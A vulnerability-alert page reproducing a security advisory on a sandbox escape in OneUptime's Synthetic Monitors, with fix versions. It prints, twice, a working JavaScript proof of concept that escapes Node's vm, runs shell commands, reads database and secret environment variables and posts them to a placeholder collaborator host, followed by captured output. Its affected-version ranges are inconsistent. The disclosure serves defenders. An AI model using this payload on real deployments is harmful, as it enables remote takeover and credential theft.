Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.9
OneUpTime Synthetic Monitors Allow Untrusted Code Execution
GHSA-h343-gg57-2q67
Summary
OneUpTime's Synthetic Monitor feature allows untrusted code to be executed in the background, which can be used by attackers to access sensitive data and take control of the system. This is a serious security risk as it can lead to unauthorized access to database and cluster credentials. To mitigate this, OneUpTime should implement secure isolation or filtering of user-supplied code to prevent such attacks.
What to do
- Update oneuptime @oneuptime/common to version 10.0.18.
- Update oneuptime common to version 10.0.18.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| oneuptime | @oneuptime/common | <= 10.0.18 | 10.0.18 |
| oneuptime | common | <= 10.0.18 | 10.0.18 |
Original title
OneUpTime's Unsandboxed Code Execution in Probe Allows Any Project Member to Achieve RCE
Original description
### Summary
OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js `vm` module. By leveraging a standard prototype-chain escape (`this.constructor.constructor`), an attacker can bypass the sandbox, gain access to the underlying Node.js `process` object, and execute arbitrary system commands (RCE) on the `oneuptime-probe` container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.
### Details
The root cause of the vulnerability exists in [Common/Server/Utils/VM/VMRunner.ts](oneuptime/Common/Server/Utils/VM/VMRunner.ts) where user-supplied JavaScript is executed using `vm.runInContext()`:
```typescript
const vmPromise = vm.runInContext(script, sandbox, { ... });
```
The Node.js documentation explicitly warns that the `vm` module is not a security boundary and should never be used to run untrusted code.
When a user creates a **Synthetic Monitor**, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., `isolated-vm` or a dedicated restricted container).
An attacker can use the payload `const proc = this.constructor.constructor('return process')();` to step out of the sandbox context and grab the host's native `process` object. From there, they can require `child_process` to execute arbitrary shell commands.
Since the `oneuptime-probe` service runs with access to sensitive environment variables (such as `ONEUPTIME_SECRET`, `DATABASE_PASSWORD`, etc.), an attacker can trivially exfiltrate these secrets to an external server.
### PoC
This exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least "Project Member" permissions.
1. **Log In**: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).
2. **Navigate**: Go to **Monitors** > **Create New Monitor**.
3. **Monitor Type**: Select **Synthetic Monitor**.
4. **Browser/Screen Settings**: Ensure **Chromium** is selected for "Browser Types" and **Desktop** is selected for "Screen Size Types".
5. **Payload Injection**: Scroll down to the "Playwright Code" editor. Delete the default template and paste the following malicious JavaScript payload:
```javascript
return new Promise((resolve) => {
try {
// 1. Traverse the prototype chain to grab the host's process object
const proc = this.constructor.constructor('return process')();
// 2. Load the host's child_process module & run a system command
const cp = proc.mainModule.require('child_process');
const output = cp.execSync('ls -la /usr/src/app').toString();
// 3. (Optional) Read sensitive environment secrets
const secret = proc.env.ONEUPTIME_SECRET;
const db_pass = proc.env.DATABASE_PASSWORD;
// 4. Exfiltrate the data via the native `http` module
const http_real = proc.mainModule.require('http');
const req = http_real.request({
hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE',
port: 80,
path: '/',
method: 'POST'
}, (res) => {
resolve("EXFILTRATION_STATUS: " + res.statusCode);
});
req.on('error', (e) => resolve("EXFILTRATION_ERROR: " + e.message));
const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });
req.write(payloadData);
req.end();
} catch(e) {
resolve("CRITICAL_ERROR: " + e.message);
}
});
```
6. **Save & Execute**: Click **Save**. Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.
OUTPUT:
```
{"rce_output":"total 296\ndrwxr-xr-x 1 root root 4096 Mar 3 18:27 .\ndrwxr-xr-x 1 root root 4096 Mar 3 18:26 ..\n-rw-r--r-- 1 root root 16 Mar 3 18:24 .gitattributes\n-rwxr-xr-x 1 root root 403 Mar 3 18:24 .gitignore\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 API\n-rw-r--r-- 1 root root 4103 Mar 3 18:24 Config.ts\n-rw-r--r-- 1 root root 2602 Mar 3 18:24 Dockerfile\n-rw-r--r-- 1 root root 2705 Mar 3 18:24 Dockerfile.tpl\n-rw-r--r-- 1 root root 2935 Mar 3 18:24 Index.ts\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Jobs\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 Services\ndrwxr-xr-x 4 root root 4096 Mar 3 18:24 Tests\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Utils\ndrwxr-xr-x 3 root root 4096 Mar 3 18:27 build\n-rw-r--r-- 1 root root 889 Mar 3 18:24 jest.config.json\ndrwxr-xr-x 297 root root 12288 Mar 3 18:26 node_modules\n-rw-r--r-- 1 root root 353 Mar 3 18:24 nodemon.json\n-rw-r--r-- 1 root root 203119 Mar 3 18:24 package-lock.json\n-rw-r--r-- 1 root root 1481 Mar 3 18:24 package.json\n-rw-r--r-- 1 root root 11514 Mar 3 18:24 tsconfig.json\n"}
```
<img width="1364" height="470" alt="image" src="https://github.com/user-attachments/assets/9e0d3013-bba5-4188-8777-6903c8f55dba" />
### Impact
**What kind of vulnerability is it?**
Remote Code Execution (RCE) / Code Injection / Sandbox Escape.
**Who is impacted?**
Any OneUptime deployment running version <= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.
---
OneUptime allows project members to run custom Playwright/JavaScript code via Synthetic Monitors to test websites. However, the system executes this untrusted user code inside the insecure Node.js `vm` module. By leveraging a standard prototype-chain escape (`this.constructor.constructor`), an attacker can bypass the sandbox, gain access to the underlying Node.js `process` object, and execute arbitrary system commands (RCE) on the `oneuptime-probe` container. Furthermore, because the probe holds database/cluster credentials in its environment variables, this directly leads to a complete cluster compromise.
### Details
The root cause of the vulnerability exists in [Common/Server/Utils/VM/VMRunner.ts](oneuptime/Common/Server/Utils/VM/VMRunner.ts) where user-supplied JavaScript is executed using `vm.runInContext()`:
```typescript
const vmPromise = vm.runInContext(script, sandbox, { ... });
```
The Node.js documentation explicitly warns that the `vm` module is not a security boundary and should never be used to run untrusted code.
When a user creates a **Synthetic Monitor**, the code inputted into the Playwright script editor is passed directly to this backend function without any AST filtering or secure isolation (e.g., `isolated-vm` or a dedicated restricted container).
An attacker can use the payload `const proc = this.constructor.constructor('return process')();` to step out of the sandbox context and grab the host's native `process` object. From there, they can require `child_process` to execute arbitrary shell commands.
Since the `oneuptime-probe` service runs with access to sensitive environment variables (such as `ONEUPTIME_SECRET`, `DATABASE_PASSWORD`, etc.), an attacker can trivially exfiltrate these secrets to an external server.
### PoC
This exploit can be triggered entirely through the OneUptime web dashboard GUI by any user with at least "Project Member" permissions.
1. **Log In**: Authenticate to the OneUptime Dashboard. (Open registration is enabled by default).
2. **Navigate**: Go to **Monitors** > **Create New Monitor**.
3. **Monitor Type**: Select **Synthetic Monitor**.
4. **Browser/Screen Settings**: Ensure **Chromium** is selected for "Browser Types" and **Desktop** is selected for "Screen Size Types".
5. **Payload Injection**: Scroll down to the "Playwright Code" editor. Delete the default template and paste the following malicious JavaScript payload:
```javascript
return new Promise((resolve) => {
try {
// 1. Traverse the prototype chain to grab the host's process object
const proc = this.constructor.constructor('return process')();
// 2. Load the host's child_process module & run a system command
const cp = proc.mainModule.require('child_process');
const output = cp.execSync('ls -la /usr/src/app').toString();
// 3. (Optional) Read sensitive environment secrets
const secret = proc.env.ONEUPTIME_SECRET;
const db_pass = proc.env.DATABASE_PASSWORD;
// 4. Exfiltrate the data via the native `http` module
const http_real = proc.mainModule.require('http');
const req = http_real.request({
hostname: 'YOUR_OAST_OR_BURP_COLLABORATOR_URL_HERE',
port: 80,
path: '/',
method: 'POST'
}, (res) => {
resolve("EXFILTRATION_STATUS: " + res.statusCode);
});
req.on('error', (e) => resolve("EXFILTRATION_ERROR: " + e.message));
const payloadData = JSON.stringify({ rce_output: output, secret: secret, db: db_pass });
req.write(payloadData);
req.end();
} catch(e) {
resolve("CRITICAL_ERROR: " + e.message);
}
});
```
6. **Save & Execute**: Click **Save**. Within 60 seconds, the probe worker will pick up the monitor, execute the code, and send the RCE output to your external listener URL.
OUTPUT:
```
{"rce_output":"total 296\ndrwxr-xr-x 1 root root 4096 Mar 3 18:27 .\ndrwxr-xr-x 1 root root 4096 Mar 3 18:26 ..\n-rw-r--r-- 1 root root 16 Mar 3 18:24 .gitattributes\n-rwxr-xr-x 1 root root 403 Mar 3 18:24 .gitignore\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 API\n-rw-r--r-- 1 root root 4103 Mar 3 18:24 Config.ts\n-rw-r--r-- 1 root root 2602 Mar 3 18:24 Dockerfile\n-rw-r--r-- 1 root root 2705 Mar 3 18:24 Dockerfile.tpl\n-rw-r--r-- 1 root root 2935 Mar 3 18:24 Index.ts\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Jobs\ndrwxr-xr-x 2 root root 4096 Mar 3 18:24 Services\ndrwxr-xr-x 4 root root 4096 Mar 3 18:24 Tests\ndrwxr-xr-x 3 root root 4096 Mar 3 18:24 Utils\ndrwxr-xr-x 3 root root 4096 Mar 3 18:27 build\n-rw-r--r-- 1 root root 889 Mar 3 18:24 jest.config.json\ndrwxr-xr-x 297 root root 12288 Mar 3 18:26 node_modules\n-rw-r--r-- 1 root root 353 Mar 3 18:24 nodemon.json\n-rw-r--r-- 1 root root 203119 Mar 3 18:24 package-lock.json\n-rw-r--r-- 1 root root 1481 Mar 3 18:24 package.json\n-rw-r--r-- 1 root root 11514 Mar 3 18:24 tsconfig.json\n"}
```
<img width="1364" height="470" alt="image" src="https://github.com/user-attachments/assets/9e0d3013-bba5-4188-8777-6903c8f55dba" />
### Impact
**What kind of vulnerability is it?**
Remote Code Execution (RCE) / Code Injection / Sandbox Escape.
**Who is impacted?**
Any OneUptime deployment running version <= 10.0.0. Since open registration is enabled by default, an external, unauthenticated attacker can create an account, create a project, and instantly compromise the entire cluster.
---
osv CVSS3.1
9.9
Vulnerability type
CWE-94
Code Injection
Published: 7 Mar 2026 · Updated: 13 Mar 2026 · First seen: 7 Mar 2026